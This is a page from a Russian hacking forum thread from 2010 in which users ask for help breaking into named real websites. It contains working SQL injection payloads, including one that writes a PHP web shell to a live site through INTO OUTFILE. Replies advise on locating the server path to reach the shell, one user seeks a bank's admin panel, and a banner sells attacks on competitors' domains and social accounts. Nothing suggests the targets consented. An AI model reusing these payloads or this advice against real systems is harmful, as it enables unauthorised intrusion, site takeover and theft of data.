Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1531 из 2438

1531

Опции темы

Поиск в этой теме

Опции просмотра

#15301

12.10.2010, 18:03

zolter

Новичок

Регистрация: 10.10.2010

Сообщений: 3

С нами: 8204726

Репутация: 0

Помогите раскрутить http://parus-grad.com.ua/SearchResult.html?ot=(select+test)

#15302

12.10.2010, 18:37

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

С нами: 8440113

Репутация: 3

Хм.. при таком запросе,

Код:

1' or (select count(*) from information_schema.tables group by concat((select concat_ws(0x3a,id,name,value,comments) from bla.configuration limit 0,1),floor(rand(0)*2)))/*

тоже выдает

Subquery returns more than 1 row

С чем это может быть связано? ..таблица configuration единственная.

#15303

12.10.2010, 18:45

ubi

Новичок

Регистрация: 25.12.2009

Сообщений: 18

С нами: 8620247

Репутация: 0

Помогите найти админку

http://www.zembank.ru/

В ПМ пожалуйста

#15304

12.10.2010, 23:17

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

С нами: 9361870

Репутация: 58

Цитата:

Сообщение от None

Access denied for user 'u1001104_spark'@'%' to database 'information_schema'

takoe mozhet byt'?

#15305

13.10.2010, 01:34

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от j0ker13

takoe mozhet byt'?

а что в этом не понятного? нету прав на information_schema

#15306

13.10.2010, 10:21

durito

Познающий

Регистрация: 06.06.2008

Сообщений: 76

С нами: 9436363

Репутация: 55

подскажите, тут просто ошибка mysql или можно что-то выкружить:

http://jmatch.com/member/profile.php?profile_id=21295740'

#15307

13.10.2010, 19:31

0pTik

Участник форума

Регистрация: 18.07.2010

Сообщений: 240

С нами: 8325686

Репутация: 17

Заливаю шелл

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2&region_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27

[/COLOR][/COLOR]

-- и никак не могу найти его ))

#15308

13.10.2010, 20:05

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

С нами: 8772211

Репутация: 56

Путь нужно указывать абсолютный. Папка, в которую пишешь, должна быть доступна для записи.

#15309

13.10.2010, 20:40

0pTik

Участник форума

Регистрация: 18.07.2010

Сообщений: 240

С нами: 8325686

Репутация: 17

Спасибо буду думать как мне путь узнать

#15310

13.10.2010, 23:21

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

С нами: 9610572

Репутация: 32

Цитата:

Сообщение от 0pTik

Спасибо буду думать как мне путь узнать

Раз file_priv есть, то ищи конфиг апача. Там будет полный путь до твоего ресурса.

Страница 1531 из 2438

1531

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Внести депозит

Депозит создан

Вывести депозит

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL